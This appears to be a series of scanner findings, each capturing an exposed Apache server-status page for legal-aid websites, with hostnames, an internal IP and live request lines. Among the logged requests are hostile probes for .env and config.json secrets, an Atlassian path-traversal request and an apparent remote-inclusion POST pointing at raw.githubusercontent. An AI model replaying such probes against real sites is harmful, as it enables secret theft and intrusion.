HTTP/1.0 45-11-0/0/1832. 0.00665600.00.0063.33 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-11-0/0/1456. 0.12661400.00.0046.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-11-0/0/1092. 0.02665400.00.0029.22 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-11-0/0/1118. 0.02665300.00.0027.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-11-0/0/913. 0.00665200.00.0043.74 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-11-0/0/1396. 0.28622300.00.0048.65 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-11-0/0/1320. 0.001841700.00.0041.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-11-0/0/898. 0.001841600.00.0022.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-11-0/0/1068. 0.001841400.00.0043.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-11-0/0/1045. 0.011841300.00.0047.88 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-11-0/0/1109. 0.021836300.00.0036.42 ::1http/1.1atlantalegalaid.org:8080
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3148fbd97948fbd979b8f2b658
Apache Status Apache Server Status for www.picturingjustice.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2022-06-23T12:51:37 Current Time: Friday, 16-Dec-2022 00:02:14 UTC Restart Time: Friday, 24-Jun-2022 06:43:41 UTC Parent Server Config. Generation: 175 Parent Server MPM Generation: 174 Server uptime: 174 days 17 hours 18 minutes 33 seconds Server load: 3.13 1.27 0.46 Total accesses: 8407308 - Total Traffic: 382.9 GB CPU Usage: u62.24 s8.6 cu0 cs0 - .000469% CPU load .557 requests/sec - 26.6 kB/second - 47.8 kB/request 36 requests currently being processed, 57 idle workers __.___KK..__._.._K..__.__._._K_.___K.__._._._K__K.__..___.__K_.. .__KKK___K..__.KKK_KKK_.._K.K_.KK.K_K___..__.K___._...K.._.KKK.K _WKKKC...K............ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-17458940/6/522794_ 1.504313240.00.3824432.87 70.132.4.89http/1.1survey.alas.org:8080GET /api/search?folderIds=0 HTTP/1.1 1-17459000/5/500032_ 1.821900.00.3724163.01 130.176.208.180http/1.1short.alas.org:8080GET / HTTP/1.1 2-174-0/0/485208. 0.411200.00.0022648.55 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 3-17459110/3/477725_ 0.764110730.00.2322242.55 70.132.4.89http/1.1survey.alas.org:8080GET /v2/_catalog HTTP/1.1 4-17459120/5/461005_ 0.8855220.00.1721553.68 130.176.29.99http/1.1events.atlantalegalaid.org:8080GET /robots.txt HTTP/1.1 5-17456550/19/439917_ 2.16600.00.2220890.48 130.176.29.77http/1.1secure.alas.org:8080GET /robots.txt HTTP/1.1 6-17456562/18/420565K 1.19102.20.6520497.51 15.158.41.176http/1.1picturingjustice.org:8080GET /s/8373e2930323e21323e22353/_/;/META-INF/maven/com.atlassia 7-17459132/8/405780K 1.30002.60.1719482.86 70.132.4.89http/1.1picturingjustice.org:8080GET /login.action HTTP/1.1 8-174-0/0/392082. 1.631300.00.0018054.48 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 9-174-0/0/364677. 1.654400.00.0017321.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 10-17459140/3/343870_ 0.784146450.00.0716138.02 70.132.4.89http/1.1atlantalegalaid.org:8080GET /login.action HTTP/1.1 11-17459310/8/311988_ 0.104300.00.0415000.94 70.132.4.89http/1.1secure.alas.org:8080GET /about HTTP/1.1 12-174-0/0/290760. 1.891900.00.0013823.82 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-17452250/66/270241_ 5.46600.02.3812643.89 130.176.29.140http/1.1events.alas.org:8080GET /mns.php?asc=await HTTP/1.1 14-174-0/0/261316. 1.93900.00.0011848.97 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-174-0/0/241208. 0.572700.00.0011172.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-17459330/3/216647_ 0.234300.00.039729.21 70.132.4.89http/1.1secure.alas.org:8080GET /login.action HTTP/1.1 17-17457632/9/185510K 0.64003.20.128755.61 70.132.4.89http/1.1picturingjustice.org:8080GET / HTTP/1.1 18-174-0/0/167704. 1.011600.00.008119.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-174-0/0/160828. 1.762800.00.007650.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-17457780/15/157306_ 1.76124210.00.267150.43 15.158.41.176http/1.1atlantalegalaid.org:8080GET /cockle1539598.html HTTP/1.1 21-17459340/3/143051_ 0.304111370.00.046692.12 70.132.4.89http/1.1survey.alas.org:8080GET /api/search?folderIds=0 HTTP/1.1 22-174-0/0/139148. 0.551400.00.006503.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-17459360/4/134089_ 0.63161250.00.075996.66 70.132.4.89http/1.1survey.alas.org:8080GET / HTTP/1.1 24-17457890/8/125119_ 1.594312760.00.275571.85 70.132.4.89http/1.1survey.alas.org:8080GET /login.action HTTP/1.1 25-174-0/0/63381. 2.402300.00.002734.97 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-17459370/2/53154_ 0.474145010.00.092385.21 70.132.4.89http/1.1atlantalegalaid.org:8080GET /config.json HTTP/1.1 27-174-0/0/43975. 0.562200.00.001967.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-17459710/3/47731_ 0.633840590.00.151944.41 70.132.4.89http/1.1events.alas.org:8080GET /config.json HTTP/1.1 29-17459723/10/39780K 0.14009.10.021647.17 70.132.4.89http/1.1picturingjustice.org:8080GET /.env HTTP/1.1 30-17459730/7/47629_ 0.114214330.00.011922.45 70.132.4.89http/1.1survey.alas.org:8080GET /about HTTP/1.1 31-174-0/0/37580. 0.533100.00.001619.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-17459790/3/40388_ 0.2026300.00.041800.72 15.158.41.176http/1.1atlantalegalaid.org:8080POST /intake/index.php?url=https%3A%2F%2Fraw.githubusercontent. 33-17459800/8/39273_ 0.014300.00.011871.77 70.132.4.89http/1.1secure.alas.org:8080GET /v2/_catalog HTTP/1.1 34-17459810/7/40343_ 0.114214450.00.011779.20 70.132.4.89http/1.1survey.alas.org:8080GET /config.json HTTP/1.1 35-17459865/21/40523K 0.39106.10.081744.29 15.158.41.176http/1.1picturingjustice.org:8080GET /config.json HTTP/1.1 36-174-0/0/38803. 0.524300.00.001846.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-17459880/6/40087_ 1.6245690.00.041877.62 130.176.29.77http/1.1events.alas.org:8080GET /robots.txt HTTP/1.1 38-17459890/3/42932_ 0.533839910.00.001662.38 70.132.4.89http/1.1events.alas.org:8080GET /about HTTP/1.1 39-174-0/0/38800. 0.532600.00.001703.82 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-17459910/7/38381_ 0.094213970.00.011652.88 70.132.4.89http/1.1survey.alas.org:8080GET /v2/_catalog HTTP/1.1 41-174-0/0/7661. 0.011500.00.00374.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-17460290/4/5131_ 1.19413010.00.03195.43 130.176.29.77http/1.1events.alas.org:8080GET /robots.txt HTTP/1.1 43-174-0/0/5416. 0.383400.00.00197.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-17460510/2/3178_ 0.61070.00.09167.96 64.252.143.86http/1.1secure.alas.org:8080HEAD / HTTP/1.1 45-17460521/2/3250K 0.621041.90.13168.65 15.158.41.176http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 46-17460530/4/2818_ 0.6646530.00.0078.27 130.176.29.99http/1.1intranet.alas.org:8080GET /robots.txt HTTP/1.1 47-17460540/3/2639_ 0.55500.00.00109.37 130.176.29.99http/1.1survey.atlantalegalaid.org:8080GET /robots.txt HTTP/1.1 48-17460555/6/2689K 0.61006.30.0993.41 70.132.4.89http/1.1picturingjustice.org:8080GET /s/5323e2531323e2430323e2334313/_/;/META-INF/maven/com.atla 49-174-0/0/2213. 0.203600.00.0078.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-17460570/6/2082_ 0.084112600.00.0294.61 70.132.4.89http/1.1survey.alas.org:8080GET /login.action HTTP/1.1 51-17460580/3/2151_ 0.6252550.00.0189.16 15.158.41.176http/1.1events.atlantalegalaid.org:8080POST /wp-cron.php?doing_wp_cron=1671148922.91263008117675781250 52-174-0/0/2667. 0.184100.00.0089.20 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-174-0/0/2062. 0.16600.00.0067.96 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-17460610/5/2112_ 0.774362810.00.1089.76 70.132.4.157http/1.1events.alas.org:8080</
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3148fbd97948fbd9791d08a809
Apache Status Apache Server Status for www.picturingjustice.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2022-06-23T12:51:37 Current Time: Friday, 16-Dec-2022 00:02:13 UTC Restart Time: Friday, 24-Jun-2022 06:43:41 UTC Parent Server Config. Generation: 175 Parent Server MPM Generation: 174 Server uptime: 174 days 17 hours 18 minutes 32 seconds Server load: 3.13 1.27 0.46 Total accesses: 8407283 - Total Traffic: 382.9 GB CPU Usage: u62.24 s8.6 cu0 cs0 - .000469% CPU load .557 requests/sec - 26.6 kB/second - 47.8 kB/request 32 requests currently being processed, 61 idle workers __.___KK..__._.._K..__.__._._K_.___K.__._._._K__K.__..___.__K_.. .__KKK___K..__.KKK_KKK_.._K.__.KW.K_K___..__.____._...K.._.KKW.K __KKKC..._............ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-17458940/6/522794_ 1.504213240.00.3824432.87 70.132.4.89http/1.1survey.alas.org:8080GET /api/search?folderIds=0 HTTP/1.1 1-17459000/5/500032_ 1.821800.00.3724163.01 130.176.208.180http/1.1short.alas.org:8080GET / HTTP/1.1 2-174-0/0/485208. 0.411200.00.0022648.55 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 3-17459110/3/477725_ 0.764110730.00.2322242.55 70.132.4.89http/1.1survey.alas.org:8080GET /v2/_catalog HTTP/1.1 4-17459120/5/461005_ 0.8855220.00.1721553.68 130.176.29.99http/1.1events.atlantalegalaid.org:8080GET /robots.txt HTTP/1.1 5-17456550/19/439917_ 2.16500.00.2220890.48 130.176.29.77http/1.1secure.alas.org:8080GET /robots.txt HTTP/1.1 6-17456562/18/420565K 1.19002.20.6520497.51 15.158.41.176http/1.1picturingjustice.org:8080GET /s/8373e2930323e21323e22353/_/;/META-INF/maven/com.atlassia 7-17459132/8/405780K 1.30002.60.1719482.86 70.132.4.89http/1.1picturingjustice.org:8080GET /login.action HTTP/1.1 8-174-0/0/392082. 1.631300.00.0018054.48 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 9-174-0/0/364677. 1.654400.00.0017321.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 10-17459140/3/343870_ 0.784146450.00.0716138.02 70.132.4.89http/1.1atlantalegalaid.org:8080GET /login.action HTTP/1.1 11-17459310/8/311988_ 0.104200.00.0415000.94 70.132.4.89http/1.1secure.alas.org:8080GET /about HTTP/1.1 12-174-0/0/290760. 1.891900.00.0013823.82 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-17452250/66/270241_ 5.46600.02.3812643.89 130.176.29.140http/1.1events.alas.org:8080GET /mns.php?asc=await HTTP/1.1 14-174-0/0/261316. 1.93900.00.0011848.97 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-174-0/0/241208. 0.572700.00.0011172.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-17459330/3/216647_ 0.234200.00.039729.21 70.132.4.89http/1.1secure.alas.org:8080GET /login.action HTTP/1.1 17-17457632/9/185510K 0.64003.20.128755.61 70.132.4.89http/1.1picturingjustice.org:8080GET / HTTP/1.1 18-174-0/0/167704. 1.011600.00.008119.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-174-0/0/160828. 1.762800.00.007650.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-17457780/15/157306_ 1.76124210.00.267150.43 15.158.41.176http/1.1atlantalegalaid.org:8080GET /cockle1539598.html HTTP/1.1 21-17459340/3/143051_ 0.304111370.00.046692.12 70.132.4.89http/1.1survey.alas.org:8080GET /api/search?folderIds=0 HTTP/1.1 22-174-0/0/139148. 0.551400.00.006503.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-17459360/4/134089_ 0.63161250.00.075996.66 70.132.4.89http/1.1survey.alas.org:8080GET / HTTP/1.1 24-17457890/8/125119_ 1.594212760.00.275571.85 70.132.4.89http/1.1survey.alas.org:8080GET /login.action HTTP/1.1 25-174-0/0/63381. 2.402300.00.002734.97 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-17459370/2/53154_ 0.474145010.00.092385.21 70.132.4.89http/1.1atlantalegalaid.org:8080GET /config.json HTTP/1.1 27-174-0/0/43975. 0.562200.00.001967.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-17459710/3/47731_ 0.633740590.00.151944.41 70.132.4.89http/1.1events.alas.org:8080GET /config.json HTTP/1.1 29-17459722/9/39779K 0.14008.10.021647.17 70.132.4.89http/1.1picturingjustice.org:8080GET / HTTP/1.1 30-17459730/7/47629_ 0.114214330.00.011922.45 70.132.4.89http/1.1survey.alas.org:8080GET /about HTTP/1.1 31-174-0/0/37580. 0.533100.00.001619.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-17459790/3/40388_ 0.2026300.00.041800.72 15.158.41.176http/1.1atlantalegalaid.org:8080POST /intake/index.php?url=https%3A%2F%2Fraw.githubusercontent. 33-17459800/8/39273_ 0.014300.00.011871.77 70.132.4.89http/1.1secure.alas.org:8080GET /v2/_catalog HTTP/1.1 34-17459810/7/40343_ 0.114214450.00.011779.20 70.132.4.89http/1.1survey.alas.org:8080GET /config.json HTTP/1.1 35-17459865/21/40523K 0.39006.10.081744.29 15.158.41.176http/1.1picturingjustice.org:8080GET /config.json HTTP/1.1 36-174-0/0/38803. 0.524300.00.001846.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-17459880/6/40087_ 1.6235690.00.041877.62 130.176.29.77http/1.1events.alas.org:8080GET /robots.txt HTTP/1.1 38-17459890/3/42932_ 0.533739910.00.001662.38 70.132.4.89http/1.1events.alas.org:8080GET /about HTTP/1.1 39-174-0/0/38800. 0.532600.00.001703.82 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-17459910/7/38381_ 0.094213970.00.011652.88 70.132.4.89http/1.1survey.alas.org:8080GET /v2/_catalog HTTP/1.1 41-174-0/0/7661. 0.011500.00.00374.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-17460290/4/5131_ 1.19413010.00.03195.43 130.176.29.77http/1.1events.alas.org:8080GET /robots.txt HTTP/1.1 43-174-0/0/5416. 0.383400.00.00197.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-17460510/2/3178_ 0.61070.00.09167.96 64.252.143.86http/1.1secure.alas.org:8080HEAD / HTTP/1.1 45-17460521/2/3250K 0.620041.90.13168.65 15.158.41.176http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 46-17460530/4/2818_ 0.6646530.00.0078.27 130.176.29.99http/1.1intranet.alas.org:8080GET /robots.txt HTTP/1.1 47-17460540/3/2639_ 0.55500.00.00109.37 130.176.29.99http/1.1survey.atlantalegalaid.org:8080GET /robots.txt HTTP/1.1 48-17460554/5/2688K 0.61005.20.0993.41 70.132.4.89http/1.1picturingjustice.org:8080GET /v2/_catalog HTTP/1.1 49-174-0/0/2213. 0.203600.00.0078.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-17460570/6/2082_ 0.084112600.00.0294.61 70.132.4.89http/1.1survey.alas.org:8080GET /login.action HTTP/1.1 51-17460580/3/2151_ 0.6252550.00.0189.16 15.158.41.176http/1.1events.atlantalegalaid.org:8080POST /wp-cron.php?doing_wp_cron=1671148922.91263008117675781250 52-174-0/0/2667. 0.184100.00.0089.20 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-174-0/0/2062. 0.16600.00.0067.96 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-17460610/5/2112_ 0.774262810.00.1089.76 70.132.4.157http/1.1events.alas.org:8080GET /.env HTTP/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3148fbd97948fbd979072c12a6
Apache Status Apache Server Status for www.picturingjustice.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2022-06-23T12:51:37 Current Time: Friday, 16-Dec-2022 00:02:13 UTC Restart Time: Friday, 24-Jun-2022 06:43:41 UTC Parent Server Config. Generation: 175 Parent Server MPM Generation: 174 Server uptime: 174 days 17 hours 18 minutes 32 seconds Server load: 3.13 1.27 0.46 Total accesses: 8407251 - Total Traffic: 382.9 GB CPU Usage: u62.2 s8.6 cu0 cs0 - .000469% CPU load .557 requests/sec - 26.6 kB/second - 47.8 kB/request 25 requests currently being processed, 69 idle workers __.___KK..__._.._K..__.__._._K_.___K.__._._.KK__K.__..___.__K_.. .__K_K___L..__.KKK_K___..__.__.K_.__K___..__.____._...W.._CKKK.K ___W__..._............ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-17458940/6/522794_ 1.504213240.00.3824432.87 70.132.4.89http/1.1survey.alas.org:8080GET /api/search?folderIds=0 HTTP/1.1 1-17459000/5/500032_ 1.821800.00.3724163.01 130.176.208.180http/1.1short.alas.org:8080GET / HTTP/1.1 2-174-0/0/485208. 0.411100.00.0022648.55 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 3-17459110/3/477725_ 0.764010730.00.2322242.55 70.132.4.89http/1.1survey.alas.org:8080GET /v2/_catalog HTTP/1.1 4-17459120/5/461005_ 0.8845220.00.1721553.68 130.176.29.99http/1.1events.atlantalegalaid.org:8080GET /robots.txt HTTP/1.1 5-17456550/19/439917_ 2.16500.00.2220890.48 130.176.29.77http/1.1secure.alas.org:8080GET /robots.txt HTTP/1.1 6-17456562/18/420565K 1.19002.20.6520497.51 15.158.41.176http/1.1picturingjustice.org:8080GET /s/8373e2930323e21323e22353/_/;/META-INF/maven/com.atlassia 7-17459131/7/405779K 1.30011.60.1719482.86 70.132.4.89http/1.1picturingjustice.org:8080GET / HTTP/1.1 8-174-0/0/392082. 1.631200.00.0018054.48 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 9-174-0/0/364677. 1.654300.00.0017321.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 10-17459140/3/343870_ 0.784046450.00.0716138.02 70.132.4.89http/1.1atlantalegalaid.org:8080GET /login.action HTTP/1.1 11-17459310/8/311988_ 0.104200.00.0415000.94 70.132.4.89http/1.1secure.alas.org:8080GET /about HTTP/1.1 12-174-0/0/290760. 1.891800.00.0013823.82 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-17452250/66/270241_ 5.46500.02.3812643.89 130.176.29.140http/1.1events.alas.org:8080GET /mns.php?asc=await HTTP/1.1 14-174-0/0/261316. 1.93800.00.0011848.97 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-174-0/0/241208. 0.572600.00.0011172.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-17459330/3/216647_ 0.234200.00.039729.21 70.132.4.89http/1.1secure.alas.org:8080GET /login.action HTTP/1.1 17-17457631/8/185509K 0.63001.60.128755.61 70.132.4.89http/1.1picturingjustice.org:8080GET / HTTP/1.1 18-174-0/0/167704. 1.011500.00.008119.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-174-0/0/160828. 1.762700.00.007650.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-17457780/15/157306_ 1.76114210.00.267150.43 15.158.41.176http/1.1atlantalegalaid.org:8080GET /cockle1539598.html HTTP/1.1 21-17459340/3/143051_ 0.304011370.00.046692.12 70.132.4.89http/1.1survey.alas.org:8080GET /api/search?folderIds=0 HTTP/1.1 22-174-0/0/139148. 0.551300.00.006503.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-17459360/4/134089_ 0.63151250.00.075996.66 70.132.4.89http/1.1survey.alas.org:8080GET / HTTP/1.1 24-17457890/8/125119_ 1.594212760.00.275571.85 70.132.4.89http/1.1survey.alas.org:8080GET /login.action HTTP/1.1 25-174-0/0/63381. 2.402200.00.002734.97 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-17459370/2/53154_ 0.474045010.00.092385.21 70.132.4.89http/1.1atlantalegalaid.org:8080GET /config.json HTTP/1.1 27-174-0/0/43975. 0.562100.00.001967.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-17459710/3/47731_ 0.633740590.00.151944.41 70.132.4.89http/1.1events.alas.org:8080GET /config.json HTTP/1.1 29-17459721/8/39778K 0.14016.60.011647.17 70.132.4.89http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 30-17459730/7/47629_ 0.114214330.00.011922.45 70.132.4.89http/1.1survey.alas.org:8080GET /about HTTP/1.1 31-174-0/0/37580. 0.533000.00.001619.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-17459790/3/40388_ 0.2025300.00.041800.72 15.158.41.176http/1.1atlantalegalaid.org:8080POST /intake/index.php?url=https%3A%2F%2Fraw.githubusercontent. 33-17459800/8/39273_ 0.014200.00.011871.77 70.132.4.89http/1.1secure.alas.org:8080GET /v2/_catalog HTTP/1.1 34-17459810/7/40343_ 0.114214450.00.011779.20 70.132.4.89http/1.1survey.alas.org:8080GET /config.json HTTP/1.1 35-17459865/21/40523K 0.39006.10.081744.29 15.158.41.176http/1.1picturingjustice.org:8080GET /config.json HTTP/1.1 36-174-0/0/38803. 0.524200.00.001846.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-17459880/6/40087_ 1.6235690.00.041877.62 130.176.29.77http/1.1events.alas.org:8080GET /robots.txt HTTP/1.1 38-17459890/3/42932_ 0.533739910.00.001662.38 70.132.4.89http/1.1events.alas.org:8080GET /about HTTP/1.1 39-174-0/0/38800. 0.532500.00.001703.82 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-17459910/7/38381_ 0.094213970.00.011652.88 70.132.4.89http/1.1survey.alas.org:8080GET /v2/_catalog HTTP/1.1 41-174-0/0/7661. 0.011400.00.00374.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-17460290/4/5131_ 1.19413010.00.03195.43 130.176.29.77http/1.1events.alas.org:8080GET /robots.txt HTTP/1.1 43-174-0/0/5416. 0.383300.00.00197.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-17460511/2/3178K 0.61470.90.09167.96 64.252.143.86http/1.1secure.alas.org:8080HEAD / HTTP/1.1 45-17460521/2/3250K 0.620041.90.13168.65 15.158.41.176http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 46-17460530/4/2818_ 0.6636530.00.0078.27 130.176.29.99http/1.1intranet.alas.org:8080GET /robots.txt HTTP/1.1 47-17460540/3/2639_ 0.55500.00.00109.37 130.176.29.99http/1.1survey.atlantalegalaid.org:8080GET /robots.txt HTTP/1.1 48-17460553/4/2687K 0.61004.10.0993.41 70.132.4.89http/1.1picturingjustice.org:8080GET / HTTP/1.1 49-174-0/0/2213. 0.203500.00.0078.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-17460570/6/2082_ 0.084012600.00.0294.61 70.132.4.89http/1.1survey.alas.org:8080GET /login.action HTTP/1.1 51-17460580/3/2151_ 0.6242550.00.0189.16 15.158.41.176http/1.1events.atlantalegalaid.org:8080POST /wp-cron.php?doing_wp_cron=1671148922.91263008117675781250 52-174-0/0/2667. 0.184000.00.0089.20 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-174-0/0/2062. 0.16500.00.0067.96 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-17460610/5/2112_ 0.774262810.00.1089.76 70.132.4.157http/1.1events.alas.org:8080GET /.env HTTP/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3148fbd97948fbd979cb665add
Apache Status Apache Server Status for www.picturingjustice.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2022-06-23T12:51:37 Current Time: Friday, 16-Dec-2022 00:02:13 UTC Restart Time: Friday, 24-Jun-2022 06:43:41 UTC Parent Server Config. Generation: 175 Parent Server MPM Generation: 174 Server uptime: 174 days 17 hours 18 minutes 32 seconds Server load: 3.13 1.27 0.46 Total accesses: 8407248 - Total Traffic: 382.9 GB CPU Usage: u62.2 s8.6 cu0 cs0 - .000469% CPU load .557 requests/sec - 26.6 kB/second - 47.8 kB/request 21 requests currently being processed, 73 idle workers __.___KW..__._..__..__.__._._W_.___K.__._._.KK__K.__..___.__K_.. .__K_K____..__.KKK_K___..__.__.K_.__K___..__.____._..._.._CKKK.K ______..._............ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-17458940/6/522794_ 1.504213240.00.3824432.87 70.132.4.89http/1.1survey.alas.org:8080GET /api/search?folderIds=0 HTTP/1.1 1-17459000/5/500032_ 1.821800.00.3724163.01 130.176.208.180http/1.1short.alas.org:8080GET / HTTP/1.1 2-174-0/0/485208. 0.411100.00.0022648.55 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 3-17459110/3/477725_ 0.764010730.00.2322242.55 70.132.4.89http/1.1survey.alas.org:8080GET /v2/_catalog HTTP/1.1 4-17459120/5/461005_ 0.8845220.00.1721553.68 130.176.29.99http/1.1events.atlantalegalaid.org:8080GET /robots.txt HTTP/1.1 5-17456550/19/439917_ 2.16500.00.2220890.48 130.176.29.77http/1.1secure.alas.org:8080GET /robots.txt HTTP/1.1 6-17456562/18/420565K 1.19002.20.6520497.51 15.158.41.176http/1.1picturingjustice.org:8080GET /s/8373e2930323e21323e22353/_/;/META-INF/maven/com.atlassia 7-17459130/6/405778W 1.30000.00.1719482.86 70.132.4.89http/1.1picturingjustice.org:8080GET / HTTP/1.1 8-174-0/0/392082. 1.631200.00.0018054.48 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 9-174-0/0/364677. 1.654300.00.0017321.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 10-17459140/3/343870_ 0.784046450.00.0716138.02 70.132.4.89http/1.1atlantalegalaid.org:8080GET /login.action HTTP/1.1 11-17459310/8/311988_ 0.104200.00.0415000.94 70.132.4.89http/1.1secure.alas.org:8080GET /about HTTP/1.1 12-174-0/0/290760. 1.891800.00.0013823.82 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-17452250/66/270241_ 5.46500.02.3812643.89 130.176.29.140http/1.1events.alas.org:8080GET /mns.php?asc=await HTTP/1.1 14-174-0/0/261316. 1.93800.00.0011848.97 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-174-0/0/241208. 0.572600.00.0011172.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-17459330/3/216647_ 0.234200.00.039729.21 70.132.4.89http/1.1secure.alas.org:8080GET /login.action HTTP/1.1 17-17457630/7/185508_ 0.634200.00.128755.61 70.132.4.89http/1.1secure.alas.org:8080GET 